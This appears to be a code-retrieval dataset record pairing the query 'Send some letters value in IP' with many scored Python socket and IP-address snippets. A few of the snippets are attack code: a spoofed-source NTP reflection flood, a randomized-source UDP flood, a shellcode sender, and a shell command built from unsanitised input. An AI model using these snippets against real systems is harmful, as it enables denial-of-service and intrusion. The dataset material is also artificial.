obj.consumer.history.all()[0].ip\n except (AttributeError, IndexError):\n return \"N/A\"", "def write_nul_bytes(self, n):\n self.write(b'\\x00' * n)", "def __init__(\n self, name: str = \"\", protocol: int | None = None, **kwargs: Any\n ) -> None:\n\n super().__init__(name=name, **kwargs)\n if not ipaddress:\n raise SoftDependencyError(\"ipaddress\")\n if protocol not in [None, 4, 6]:\n raise ValueError(\"IpAddress protocol needs to be either 4, 6 or None\")\n self.protocol = protocol", "def fillna_method(request: Any) -> Any:\n return request.param", "def fillna_method(request: Any) -> Any:\n return request.param", "def gateway(self):\n return ''", "def noneType(value):\r\n return ''", "def test_format_phone_none(self):\n number1 = None\n self.assertEqual(format_phone(number1), None)", "def encode_null_term(self, input):\n return input.encode() + b'\\x00'", "def allowNoneIngressLabel(self):\n return self.isAllowedIngressLabel(None)", "def allowNoneIngressLabel(self):\n return self.isAllowedIngressLabel(None)", "def test_mask_secret_null():\n assert utils.mask_secrets(\"\", None) == \"\"", "def validateIp(sValue, aoNilValues = tuple([None, '']), fAllowNull = True):\n if sValue in aoNilValues:\n return (sValue, None if fAllowNull else 'Mandatory.');\n\n if sValue == '::1':\n return (sValue, None);\n\n try:\n socket.inet_pton(socket.AF_INET, sValue); # pylint: disable=E1101\n except:\n try:\n socket.inet_pton(socket.AF_INET6, sValue); # pylint: disable=E1101\n except:\n return (sValue, 'Not a valid IP address.');\n\n return (sValue, None);", "def address_str(self) -> str | None:\n pass", "def __init__(__self__, *,\n ip: Optional[pulumi.Input['IPAccessControlArgs']] = None):\n if ip is not None:\n pulumi.set(__self__, \"ip\", ip)", "def __init__(__self__, *,\n ip: Optional[pulumi.Input['IPAccessControlArgs']] = None):\n if ip is not None:\n 
pulumi.set(__self__, \"ip\", ip)", "def allow_ip_sans(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")", "def to_net(self, value):\n return value", "def test_serialize_none(self):\n self.assertEqual(serialize(None), 'null')", "def get_local_host_ip(self) -> str:", "def _send(self, what, value, address, **kwargs):\n\n print('_send: please override me.')", "def test_replace_host_subnet(self):\n pass", "def get_ip(request):\n ip1 = request.META.get('REMOTE_ADDR', '')\n ip2 = request.META.get('HTTP_X_FORWARDED_FOR', '').split(\",\")[0].strip()\n ip = ip1 or ip2 or '0.0.0.0'\n return ip", "def noop():", "def unknown_address(ip_address: str) -> dict:\n address = UNKNOWN_COUNTRY.copy()\n address.update({\"remote_addr\": ip_address})\n return address", "def get_ip_dotted(self):\r\n return socket.inet_ntoa(struct.pack('>I', self.ip))", "def get_ip_string():\n return netifaces.ifaddresses('br0')[netifaces.AF_INET][0]['addr']", "def host_ip(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"host_ip\")", "def send_error(self, conn, msg):\n # dst ip becomes src ip to return the message\n\n # src ip becomes this ip\n\n # type becomes \"no route\"\n\n # msg is empty\n\n # send from port incoming...current dst ip?\n\n # TODO\n\n return", "def ip_address(self) -> str:\n return self._device.ip if self.is_connected else None", "def get_ip_address(self): # type: () -> t.Optional[str]\n if self.networks:\n network_name = get_docker_preferred_network_name(self.args)\n\n if not network_name:\n # Sort networks and use the first available.\n # This assumes all containers will have access to the same networks.\n network_name = sorted(self.networks.keys()).pop(0)\n\n ipaddress = self.networks[network_name]['IPAddress']\n else:\n ipaddress = self.network_settings['IPAddress']\n\n if not ipaddress:\n return None\n\n return ipaddress", "def encode_none_node(self):\n return self.zero_buffer, self.zero_buffer", "def forget_unicast_address(self):\n self.send_packet('\\xb3')", "def ip_info():\n return str(getIP())", "def sendingString(self):\n return ''", "def fingertip_no_remote(self) -> bool:\n hcell = self._get_hcell2()\n return hcell.get(\"fingertip_no_remote\", False)", "def getIp(self):\n raise NotImplementedError", "def test_default_default_body_sent_with_request(self):\n req = self.httpbin.get_my_ip(dry_run=True)\n def_body = self.httpbin.client[\"default_data\"]\n self.assertIn(urlencode(def_body), req.prepared_request.body)", "def true_sendto(conn, data, address, special=False):\n if special:\n data = pickle.dumps(data)\n else:\n data = data.encode()\n conn.sendto(key.encrypt(data), (address[0], address[1])) # (ip_dst, dport)", "def get_node_ip(\n self,\n name,\n ):\n pass", "def ip(self, ip: str):\n\n self._ip = ip", "def none(self):", "def _get_blank_value_18(field):\n if field.null:\n return None\n else:\n return field.value_to_string(None)", "def na(fluid,network,propname,**params):\n value = -1\n network.set_pore_data(phase=fluid,prop=propname,data=value)", "def ip(self) -> str:\n return pulumi.get(self, \"ip\")", "def __str__(self):\n return self.the_ip", "def _decode_none(value):\n return value", "def test_email_is_None(self):\n settings.GTMETRIX_REST_API_EMAIL = None\n with raises(GTmetrixEmailIsNone):\n gt = GTmetrixInterface()", "def test_default_country_by_ip_no_settings(self):\n\n response = self.client.get(\n reverse(\"billing_info\"), HTTP_X_FORWARDED_FOR=\"85.214.132.117\"\n )\n self.assertEqual(response.status_code, 200)\n self.assertContains(\n 
response, '<option value=\"\" selected>---------</option>', html=True\n )", "def test_init_no_ip(self):\n # mocks of files\n rsa_ca_priv_file, rsa_priv_file, rsa_cert_file = range(3)\n\n ap = APInfo(port_id=1, ip=None, mac=\"bb:bb:bb:bb:bb:bb\", radio_mac=\"bb:bb:bb:bb:bb:00\", udp_port=12345, wlc_ip='1.1.1.1',\n gateway_ip='1.1.1.2', ap_mode=APMode.LOCAL, rsa_ca_priv_file=rsa_ca_priv_file, rsa_priv_file=rsa_priv_file, rsa_cert_file=rsa_cert_file)\n self.assertEqual(ap.ip, None)", "def _validateIpNN(dErrors, sName, sValue):\n (sValue, sError) = ModelDataBase.validateIp(sValue, fAllowNull = False);\n if sError is not None:\n dErrors[sName] = sError;\n return sValue;", "def __init__(self, ip, mask):\n self.vip = ip\n self.mask = mask", "def public_ip_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"public_ip_address\")", "def test_clean_ip(self):\n\n raw_ip = 'client=mail-ed1-f51.google.com[209.85.208.51]'\n result = clean_ip(raw_ip)\n self.assertEqual(result, '209.85.208.51')", "def send(value):\r\n return value", "def hex_encode_ip(ip_addr):\n if not ip_addr:\n return None\n\n return base64.b16encode(ip_addr.packed).rjust(32, '0')", "def _server_address() -> Optional[str]:\n return None", "def softupdate_ip(request, ipaddress):\n\n softupdate_key = settings.SOFTUPDATE_KEY\n if request.POST.get(\"key\", \"invalid_key\") != softupdate_key:\n raise PermissionDenied()\n\n # LC: UGGLY and not \"portable\"\n STATUS_EN_SERVICE = 'En service'\n\n def noanswer(reason=\"\"):\n message = \"\"\"Modification impossible.\\n\"\"\"\n if reason and settings.DEBUG:\n message += \"\"\"%s\\n\"\"\" % (reason,)\n return HttpResponse(message, content_type=\"plain/text\")\n\n serial = request.POST.get(\"serial\", None)\n hostname = request.POST.get(\"hostname\", None)\n\n host = None\n errmsgs = []\n\n if serial:\n hosts = Host.objects.filter(serial=serial)\n if len(hosts) == 1:\n host = hosts[0]\n elif len(hosts) > 1:\n for h in hosts:\n if h.ip == ipaddress:\n host = h\n break\n\n if not host:\n errmsgs.append(\"Le host serial=%s est introuvable.\" % (serial,))\n\n if hostname and not host:\n hosts = Host.objects.filter(hostname=hostname,\n status__description=STATUS_EN_SERVICE)\n if len(hosts) == 1:\n host = hosts[0]\n elif len(hosts) > 1:\n for h in hosts:\n if h.ip == ipaddress:\n host = h\n break\n\n # Get the last log entry\n hostlogs = HostIPLog.objects.filter(host=host, log_ip=ipaddress) \\\n .order_by(\"-date\")\n if hostlogs:\n hostlog = hostlogs[0]\n else:\n hostlog = HostIPLog(host=host, log_ip=ipaddress)\n \n hostlog.log_queryfrom = get_request_remote_addr(request)\n hostlog.log_hostname = request.POST.get('hostname', 'unknown')\n hostlog.save()\n\n return HttpResponse('ok.', content_type='plain/text')", "def test_no_ip_address_passed(self, api_client):\n runner = CliRunner()\n\n with patch(\"greynoise.cli.helper.sys\") as sys:\n sys.stdin.isatty.return_value = True\n result = runner.invoke(\n subcommand.ip, parent=Context(main, info_name=\"greynoise\")\n )\n assert result.exit_code == -1\n assert \"Usage: greynoise ip\" in result.output\n api_client.ip.assert_not_called()", "def render_ethIP(self, ctx, data):\n iface = data\n \n def ret(ipadd):\n ips = []\n for i in ipadd.strip('\\n').split('\\n'):\n ln = i.strip('\\n').strip()\n if not ln:\n continue\n ips.append(i.split()[1])\n\n if ips:\n return ctx.tag[\n [[ip, tags.br] for ip in ips]\n ]\n else:\n return [\"None assigned\"]\n \n return WebUtils.system('ip addr show dev %s | grep \"inet \"' % iface).addBoth(ret)" ]
[ "0.5996742", "0.586887", "0.586887", "0.5854512", "0.5837289", "0.577436", "0.5667391", "0.5623846", "0.56065077", "0.55768406", "0.5550488", "0.55322266", "0.54811656", "0.54618883", "0.54348487", "0.54248166", "0.541617", "0.54040885", "0.53847426", "0.53496665", "0.53496665", "0.5349264", "0.5347085", "0.53384", "0.5332145", "0.53252417", "0.5323079", "0.53045195", "0.5301259", "0.52820104", "0.5272688", "0.5270564", "0.52563", "0.52526516", "0.5242395", "0.5242395", "0.5242395", "0.5242395", "0.52360874", "0.52201927", "0.52140033", "0.5212197", "0.5209124", "0.5206477", "0.52056265", "0.52056265", "0.5180363", "0.51727265", "0.51708376", "0.51665366", "0.5154006", "0.5154006", "0.5140343", "0.51275104", "0.51152146", "0.5103364", "0.5103364", "0.51019984", "0.5091074", "0.509014", "0.50867414", "0.50781506", "0.50765425", "0.50694686", "0.5062961", "0.5062734", "0.5059899", "0.50427246", "0.5035386", "0.50324154", "0.5024569", "0.502389", "0.5018825", "0.50183123", "0.5016825", "0.5015123", "0.500128", "0.49984753", "0.4994548", "0.4994467", "0.49936318", "0.4990226", "0.49863678", "0.49796546", "0.49768493", "0.49752748", "0.49699652", "0.49667615", "0.49633387", "0.49601528", "0.49564457", "0.49560207", "0.49485067", "0.4943868", "0.49408832", "0.49381334", "0.49355012", "0.49343517", "0.4931658", "0.49313754", "0.49304825" ]
0.0
-1
Send some letters value in IP
def test_48(self): assert 'False' == Api.requestBlock('test-48', CustomFields=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ip(self, mess, args):\n return '%s\\n' % urlgrabber.urlread('http://whatismyip.org')", "def _send(self, what, value, address='localhost:44818', **kwargs):\n\n tag_string = ''\n tag_string = EnipProtocol._tuple_to_cpppo_tag(what, value)\n # print 'DEBUG enip _send tag_string: ', tag_string\n\n cmd = shlex.split(\n self._client_cmd +\n '--log ' + self._client_log +\n '--address ' + address +\n ' ' + tag_string\n )\n # print 'DEBUG enip _send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR enip _send: ', error)", "def getServerIP():\n # Create a UDP socket at client side\n UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.settimeout(0.15)\n\n \n for i in ['127.0.0.1']+list(range(0,256)):#iterating through all network IPs....127.0.0.1 is localhost\n try:\n IP=\"192.168.2.\"+str(i) if i!='127.0.0.1' else i #\n print(IP,end=\" \") \n UDPClientSocket.sendto(bytesToSend, (IP, 20001))#send message\n msg,IP = UDPClientSocket.recvfrom(bufferSize)#get response\n if (msg==str.encode(ACK_MESSAGE)):\n print()#printed IP wont clear without this command\n cls()#if IP found it clears all the console \n return IP[0]\n except Exception as e:\n print(e)\n \n return 0", "def change_ip(sender_socket, ip, port):\n sender_socket.sendto(bytes(\"change ip\", \"UTF-8\"), (ip, port))\n new_ip_str = input(\"New Host IP Address: \")\n sender_socket.sendto(bytes(new_ip_str, \"UTF-8\"), (ip, port))\n sleep(0.5)\n status = sender_socket.recv(BUFFER_SIZE)\n status_message = status.decode(\"UTF-8\")\n if \"IP Address Successfully Changed\" in status_message:\n print(status_message)\n return True\n else:\n print(status_message)\n return False", "def send(self,message):\n self.transport.write(message, (\"228.0.0.5\", udpbport))", "def showIP(ans, ip):\n\tparam = ans.split(\"=\")[1]\n\tprint \"%s\\t\\t http://%s:%s\" % (param, ip, port)", "def pack_ip(self, str_ip):\n return struct.pack(\">BBBB\", *[ int(c) for c in str_ip.split(\".\") ])", "def overlay_ip(ip):\n return \"192.168.{}.{}\".format( *ip.split(\".\")[2:])", "def get_ip_dotted(self):\r\n return socket.inet_ntoa(struct.pack('>I', self.ip))", "def test_ip(self):\n ##Todo: Improve this check\n ip = socket.gethostbyname(socket.gethostname())\n ip = [int(i) for i in ip.split('.')]\n assert len(ip) == 4\n assert ip[0] == 10\n assert ip[1] == 137\n assert ip[2] == 1\n assert ip[3] >= 1 and ip[3] <= 255", "def ipAddress():\n \n sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sk.connect((\"8.8.8.8\", 80))\n ip = (sk.getsockname()[0])\n sk.close()\n return str(ip)", "def send(value):\r\n return value", "def echo(s_socket):\r\n value = raw_input(\"#> \")\r\n bytes_value = to_bytes(len(value) + 5, 4, 'little')\r\n s_socket.send('d' + bytes_value + value)\r\n print(s_socket.recv(64))", "def hex2ip(self, irc, msg, args, iphex):\n \n ip = self._numToDottedQuad(iphex)\n if ip and len(iphex) == 8:\n record = self._record_by_addr(ip)\n if record:\n reply = u'%s (%s)' % (ip, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n else:\n reply = u'Invalide Eingabe'\n irc.reply(reply.encode('utf-8'))", "def genIp():\n ip = \".\".join(str(random.randint(0, 255)) for _ in range(4))\n return ip", "def ip2host(self, irc, msg, args, ip):\n \n try:\n hostname = socket.gethostbyaddr(ip)\n hostname = hostname[0]\n if hostname:\n record = self._record_by_addr(ip)\n if record:\n reply 
= u'%s (%s)' % (hostname, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n except:\n reply = u'gethostbyaddr() Error'\n \n irc.reply(reply.encode('utf-8'))", "def get_ip_type1(self) -> str:\n hex_ip = hexlify(self.message)[152:160]\n ip_addr = int(hex_ip[6:8] + hex_ip[4:6] + hex_ip[2:4] + hex_ip[0:2], 16)\n return inet_ntoa(pack(\"<L\", ip_addr))", "def get_ip(self):", "def wr32(add,dat):\r\n global this_fpga_ip\r\n global this_sock\r\n global this_udp_port\r\n \r\n pkt = array.array('L')\r\n pkt.append(1001) #psn\r\n pkt.append(2) #opcode\r\n pkt.append(1) #noo\r\n pkt.append(add) #sa\r\n pkt.append(dat) #dat\r\n \r\n this_sock.sendto(bytes(pkt.tostring()),(this_fpga_ip,this_udp_port))\r\n data, addr = this_sock.recvfrom(10240)\r\n return", "def format_ip(addr):\n return \\\n str(ord(addr[0])) + '.' + \\\n str(ord(addr[1])) + '.' + \\\n str(ord(addr[2])) + '.' + \\\n str(ord(addr[3]))", "def _send(self, p: str, s) -> bytes:\n\n b = self._to_netstring(p.encode('ascii'))\n\n failure = s.sendall(b)\n if failure is not None:\n self._send(p, s)\n return b", "def send_exploit(ip: str, port: int) -> None:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((ip, port))\n sock.settimeout(5)\n sock.send(build_buf(add_shellcode()))\n try:\n print(sock.recv(1024))\n except socket.timeout:\n pass\n finally:\n sock.close()", "def injectERP(amp=1,host=\"localhost\",port=8300):\n import socket\n try:\n socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0).sendto(bytes(amp),(host,port))\n except: # sliently igore any errors\n pass", "def ip_triplet(request):\n oip = get_ip(request=request)\n ips = oip.split(\".\")[:-1]\n ip = \".\".join(ips)\n return ip", "def handle_ip(bot, ievent):\n try:\n item = ievent.args[0]\n except IndexError:\n ievent.missing('<hostname>')\n return\n try:\n ipnr = socket.gethostbyname(item)\n ievent.reply(ipnr)\n except:\n ievent.reply(\"can't match \" + str(item))", "def handle_hexip(bot, ievent):\n if not ievent.args:\n return ievent.missing('<ip | hex ip>')\n is_a = None\n if _re_hexip.match(ievent.args[0]):\n is_a = 'hexip'\n else:\n try:\n socket.inet_pton(socket.AF_INET, ievent.args[0])\n is_a = 'defip'\n except socket.error:\n pass\n if not is_a:\n ievent.missing('<ip | hex ip>')\n return\n if is_a == 'hexip':\n ip = []\n for i in range(4):\n ip.append(str(int(ievent.args[0][i*2:i*2+2], 16)))\n ip = '.'.join(ip)\n nevent = copy.copy(ievent)\n nevent.args = [ip]\n handle_dns(bot, nevent)\n else:\n test = ievent.args[0].split('.')\n ip = 16777216 * int(test[0]) + 65536 * int(test[1]) + 256 * \\\nint(test[2]) + int(test[3])\n ievent.reply('ip %s = %08x' % (ievent.args[0], ip))", "def send(self, x):\n print x", "def send_magic_packet(\n *macs: str,\n ip_address: str = BROADCAST_IP,\n port: int = DEFAULT_PORT,\n interface: Optional[str] = None\n) -> None:\n packets = [create_magic_packet(mac) for mac in macs]\n\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:\n if interface is not None:\n sock.bind((interface, 0))\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n sock.connect((ip_address, port))\n for packet in packets:\n sock.send(packet)", "def _send(self, data: str):\n try:\n self._sock.sendto(data.encode(\"ascii\"), self._addr)\n except (socket.error, RuntimeError):\n # No time for love, Dr. 
Jones!\n pass", "def hex_encode_ip(ip_addr):\n if not ip_addr:\n return None\n\n return base64.b16encode(ip_addr.packed).rjust(32, '0')", "def host2ip(self, irc, msg, args, hostname):\n \n try:\n ip = socket.gethostbyname(hostname)\n if ip:\n record = self._record_by_addr(ip)\n if record:\n reply = u'%s (%s)' % (ip, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n \n except:\n reply = u'gethostbyname() Error'\n \n irc.reply(reply.encode('utf-8'))", "def ip():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 80))\n ip = s.getsockname()[0]\n s.close()\n return ip", "def int2ip(n: int) -> str:\n return socket.inet_ntoa(struct.pack(\"!I\", n))", "def JP_addr(self, addr):\n\t\tself.IP = addr", "def sendTCP_raw_single(m,ip,port):\n s=socket.socket()\n s.settimeout(1)\n s.connect((ip,port))\n s.send(m.data)\n #print (\"RetVal: %s\" % s.recv(1000))\n return s.recv(1000)", "def true_sendto(conn, data, address, special=False):\n if special:\n data = pickle.dumps(data)\n else:\n data = data.encode()\n conn.sendto(key.encrypt(data), (address[0], address[1])) # (ip_dst, dport)", "def change_IP(self,server_IP,MAC):\n content = {'server_IP':server_IP,'MAC_address':MAC}\n content = json.dumps(content)\n headers = {\"Content-Type\":\"application/json\"}\n #address will be given by the api\n r = requests.post(f\"http://{self.webserver_address}/api/camera/update_ip\", data = content,headers = headers,verify=False)\n if(r.status_code == 200):\n return True\n return False", "def sendInstruction(self, instruction):\n # instruction = '!'\n print(f'Sending: {instruction}')\n self.ser.write(instruction.encode(\"ascii\"))\n self.ser.write('\\n'.encode(\"ascii\"))\n\n self.ser.reset_input_buffer()\n\n ser_bytes = self.ser.read(1)\n print(f'Receiving\\nraw data: {ser_bytes}')\n\n # decoded_bytes = (ser_bytes.decode(\"ascii\"))\n # print(f'Ascii Value: {decoded_bytes}', flush=True)", "def sendString(self, data):\n self.transport.write(pack(\"!i\",len(data))+data)", "def get_random_ip():\n return \".\".join(str(random.randrange(1, 255)) for i in range(4))", "def dosEm(target, ntplist, data, currentserver):\n ntpserver = ntplist[currentserver] #LOAD THE SERVER\n packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #CONSTRUIRE LE PAQUER\n send(packet,loop=1) #ENVOYER ", "def send(self, s):\n self.port.write(bytes(s, 'latin-1'))\n sys.stdout.write(s)", "def for_ip_address_truenas_controller_2_enter_ip_select_28_netmask(driver, ip, netmask):\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Failover IP Address (TrueNAS Controller 2)\"]').clear()\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Failover IP Address (TrueNAS Controller 2)\"]').send_keys(ip)\n driver.find_element_by_xpath('//mat-select[@ix-auto=\"input__Failover IP Address (TrueNAS Controller 2)\"]').click()\n driver.find_element_by_xpath(f'//mat-option[@ix-auto=\"option__{netmask}\"]').click()", "def get_primary_ip(options, index):\n\n second_octet = 160 + index\n return \"192.%s.1.1\" % second_octet", "def send(self, value):\n pass", "def JP_V0_addr(self, addr):\n\t\tself.IP = addr + self.V[0]", "def _send(self, raw, addr):\n raise NotImplementedError('implement using any Transport Layer')", "def send_arp( ifname , address ):\n\ttry:\n\t\teth_socket = socket.socket( socket.AF_PACKET , socket.SOCK_RAW) ;\n\t\teth_socket.bind( (ifname , ETH_TYPE_ARP) ) ;\n\t\tprint eth_socket.getsockname() ;\n\t\teth_addr = eth_socket.getsockname()[4] ;\n\t\t\n\texcept socket.error, 
(errno , msg ) :\n\t\tif errno == 1 :\n\t\t\tprint \"arp message can only be sent by root\" \n\t\t\tclose( eth_socket ) ;\n\t\t\treturn False ;\n\t\n\tarp_frame = [\n\t\tstruct.pack( \"!h\" , 1 ) ,\n\n\t\tstruct.pack(\"!h\", 0x0800 ) ,\n\n\t\tstruct.pack(\"!B\" , 6 ) ,\n\n\t\tstruct.pack(\"!B\" , 4 ) ,\n\n\t\tstruct.pack(\"!h\" , ARP_REQUEST ) ,# request\n\n\t\teth_addr , # sender\n\n\t\tsocket.inet_aton( sender_IP ) , # sender\n\n\t\tETH_ZERO,\n\n\t\tsocket.inet_aton( another_IP )\n\t]\n\n\teth_frame = [\n\t\tETH_BROADCAST,\n\n\t\teth_addr ,\n\t\tstruct.pack(\"!h\" , ETH_TYPE_ARP ),\n\t\t''.join( arp_frame )\n\n\t]\n\n\teth_socket.send(''.join(eth_frame) );\n\teth_socket.close();", "def _send(self, what, value, address, **kwargs):\n\n print('_send: please override me.')", "def __str__(self):\n return \"{}\".format(visiteur.ip)", "def render_ethIP(self, ctx, data):\n iface = data\n \n def ret(ipadd):\n ips = []\n for i in ipadd.strip('\\n').split('\\n'):\n ln = i.strip('\\n').strip()\n if not ln:\n continue\n ips.append(i.split()[1])\n\n if ips:\n return ctx.tag[\n [[ip, tags.br] for ip in ips]\n ]\n else:\n return [\"None assigned\"]\n \n return WebUtils.system('ip addr show dev %s | grep \"inet \"' % iface).addBoth(ret)", "def setIpaddr(self):\n\t\tself.ipaddr = self.settings.getKeyValue('ipaddr')\n\t\tself.socket.send('setenv ipaddr ' + self.ipaddr+'\\r', 1)\t\t\n\t\treturn None", "def morseToPubIP(self, address):\n ip_from_morse = address[0];\n port_from_morse = address[1];\n \n ip_from_str = \"0.0.\";\n ip_from_str += str(ord(ip_from_morse[0])) + \".\" + str(ord(ip_from_morse[1]));\n port_from_str = str(ord(port_from_morse));\n \n return ip_from_str, port_from_str;", "def set_host_ip(self, host, host_ip):\n host.setIP(str(host_ip.ip), prefixLen=self.NETPREFIX)", "def spoof_packet(packet):", "def geoip(self, irc, msg, args, ip):\n \n record = self._record_by_addr(ip)\n if record:\n reply = u'%s (%s)' % (ip, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n irc.reply(reply.encode('utf-8'))", "def setIP(self, idx, ip):\n self.ip[int(idx)-1] = ip", "def test_clean_ip(self):\n\n raw_ip = 'client=mail-ed1-f51.google.com[209.85.208.51]'\n result = clean_ip(raw_ip)\n self.assertEqual(result, '209.85.208.51')", "def api_myip():\n return request.remote_addr, 200, {'Content-Type': 'text/plain'}", "def get_address(self):\r\n return \"iDigi\"", "def sendto(self, data: bytes, address: Tuple) -> int:\n ...", "def send_pan(self, value=63, ch=None):\n self.send_control_change(PAN, value, ch=ch)", "def sendPing(self, payload=None):", "def upd_attack(host, cmds):\n\ttry:\n\t\tport = int(cmds[2])\n\t\tamount = 1\n\t\ttry: \n\t\t\tamount = int(cmds[3])\n\t\texcept IndexError as i:\n\t\t\tamount = 1\n\t\tfor i in range(0, amount):\n\t\t\tIP_Packet = IP()\n\t\t\tIP_Packet.src = randomIP()\n\t\t\tIP_Packet.dst = host\n\t\t\tsend(IP_Packet/UDP(dport=port))\n\t\tprint(\"sent %s UDP Packets\" % amount)\n\t\tprint(\"UDP Packet details:\")\n\t\tudp = UDP(dport=port)\n\t\tudp.show()\n\texcept Exception as e:\n\t\tprint('something went wrong in udp_attack ', e)\n\t\tprint('cmds: ', cmds)", "def __str__(self):\n return self.the_ip", "def int_2_ip_str(ip_int):\n return socket.inet_ntoa(struct.pack(\"!I\", ip_int))", "def getnetwork(ipaddr):\n return '192.168.1.0/24'", "def send_string(self, code_num, msg):\n self.client.send(f\"{code_num}_{msg}\".encode())", "def ip_info():\n return str(getIP())", "def send_error(self, conn, msg):\n #print(\"THIS IS CONNNNNNNNNNNNNNNNNNNN\", conn.getsockname(), 
conn.getpeername()) \n usIP = conn.getpeername()[:-1] + \"1\" \n #print(usIP) \n no_route = {\"src\": usIP, \"dst\": msg[\"src\"], \"type\": \"no route\", \"msg\": {}}\n conn.send(json.dumps(no_route).encode(\"ascii\"))\n return", "def get_ip_type2(self) -> str:\n hex_ip = hexlify(self.message)[154:162]\n ip_addr = int(hex_ip[0:2] + hex_ip[2:4] + hex_ip[4:6] + hex_ip[6:8], 16)\n return inet_ntoa(pack(\">L\", ip_addr))", "def sendTCP_raw_bytes(data,ip,port):\n s=socket.socket()\n s.settimeout(3)\n s.connect((ip,port))\n s.send(data)\n #print (\"RetVal: %s\" % s.recv(1000))\n return s.recv(1000)", "def send_packet(self, p: str):\n\n self._send(p, self.socket)", "def func(self):\n return 'AAA{0[iface]}BBB{0[port]}'.format(self.opts)", "def change_ip(self, address: int) -> None:\n self.regs[\"ip\"].write(address)", "def transmit(self,char):\n\t\tif len(char) == 1 and self._connected == True:\n\t\t\tself._sock.send(char)", "def sendOTP(code):\n # Modify the code here to change from print to any output \n print(\"Your OTP is \" + code + \". Kindly do not share it with anyone\")", "def randomIP():\n\tip = \".\".join(map(str, (random.randint(0,255)for _ in range(4))))\n\treturn ip", "def sendValue(self, value):\n\n print(f'Sending: {value}\\n')\n self.ser.write(bytes([value]))\n self.ser.write('\\n'.encode(\"ascii\"))\n\n self.ser.reset_input_buffer()\n ser_bytes = self.ser.read(1)\n print(f'Receiving\\nraw data: {ser_bytes}')\n\n\n #decoded_bytes = (ser_bytes.decode(\"ascii\"))\n\n #print(f'Ascii Value: {decoded_bytes}', flush=True)", "def new_ip(self, ip):\n if not ip in self.ip_list:\n self.ip_list.add(ip)\n host = self.hs.id_to_object(ip)\n host.add_tag('sniffer')\n host.save()\n print_success(\"New ip address: {}\".format(ip))", "def callback(self, packet):\n\n\t\tsrc = packet[IP].src\n\t\tdst = packet[IP].dst\n\n\t\tif TCP in packet:\n\t\t\tsrc_port = packet[TCP].sport\n\t\t\tdst_port = packet[TCP].dport\n\t\telif UDP in packet:\n\t\t\tsrc_port = packet[UDP].sport\n\t\t\tdst_port = packet[UDP].dport\n\t\telse:\n\t\t\tsrc_port = \"other\"\n\t\t\tdst_port = \"other\"\n\n\t\tdata = src + \":\" + str(src_port) + \"-\" + dst + \":\" + str(dst_port)\n\t\tdata = self.padding(data)\n\t\tsock.send(data.encode())", "def sendto(self,msg,address):\n\n address = self.pubIPToMorse(address);\n \n if not self.validIPAndPort:\n print(\"Error: Invalid IP and port or socket has not been bound with an IP and port: message not sent!\");\n return;\n\n to_ip_addr = address[0];\n to_port = address[1];\n msg = msg.decode(\"utf-8\"); #Convert from bytearray to a string for ease of operation\n\n # Assemble UDP package\n udp_package = to_port + self.my_port + msg;\n\n # Assemble IP package\n ip_header = to_ip_addr + self.my_ip_addr + self.protocol_identifier + t.base36encode(len(udp_package));\n ip_package = ip_header + udp_package;\n\n # Assemble MAC package\n # First check to see if the MAC of the recieving IP is known, if not address message to router\n if to_ip_addr in self.macDict.keys(): mac_to = self.macDict[to_ip_addr];\n else: mac_to = self.macDict['router_mac']; # This only works if you're not the router...\n # Then assemble the remainder of the MAC package\n mac_from = self.my_mac;\n # Send the message\n print(mac_to+mac_from+ip_package)\n t.sendMessage(mac_to,mac_from,ip_package);", "def send_ping(my_socket, ip_addr, ID):\n ip = socket.gethostbyname(ip_addr)\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n my_checksum = 0\n\n # Make a dummy heder with a 0 checksum\n # 
struct.pack(fmt, v1, v2, ...)\n # Return a string containing the values v1, v2, ... packed\n # according to the given format.\n # b:signed char, h:short 2, H:unsigned short 2\n header = struct.pack('bbHHh', ICMP_ECHO_REQUEST, 0, my_checksum, ID, 1)\n # struct.calcsize(fmt)\n # Return the size of the struct corresponding to the given format.\n byte_in_double = struct.calcsize(\"d\") # C type: double\n data = (192 - byte_in_double) * \"P\" # any char is OK, any length is OK\n data = struct.pack(\"d\", time.clock()) + data\n\n # Calculate the checksum on the data and the dummy header.\n my_checksum = get_checksum(header + data)\n\n # It's just easier to make up a new header than to stuff it into the dummy.\n # socket.htons(x)\n # Convert 16-bit positive integers from host to network byte order.\n header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), ID, 1)\n packet = header + data\n # my_socket.sendto(packet, (ip, 1)) # getsockaddrarg() takes exactly 2 arguments\n my_socket.sendto(packet, (ip, 80)) # it seems that 0~65535 is OK (port?)", "def send_udp_message(message, address, port):\n message = message.replace(\" \", \"\").replace(\"\\n\", \"\")\n server_address = (address, port)\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n sock.sendto(binascii.unhexlify(message), server_address)\n while True:\n data, _ = sock.recvfrom(4096)\n ss = binascii.hexlify(data).decode(\"utf-8\")\n sss = ss[82:]\n global test\n test = test+sss\n if ss == \"ffffff\":\n break\n\n finally:\n sock.close()\n return binascii.hexlify(data).decode(\"utf-8\")", "def getIP():\n data = _get_page(\"http://myip.cz\")\n data = data.split(\"Your IP Address is: 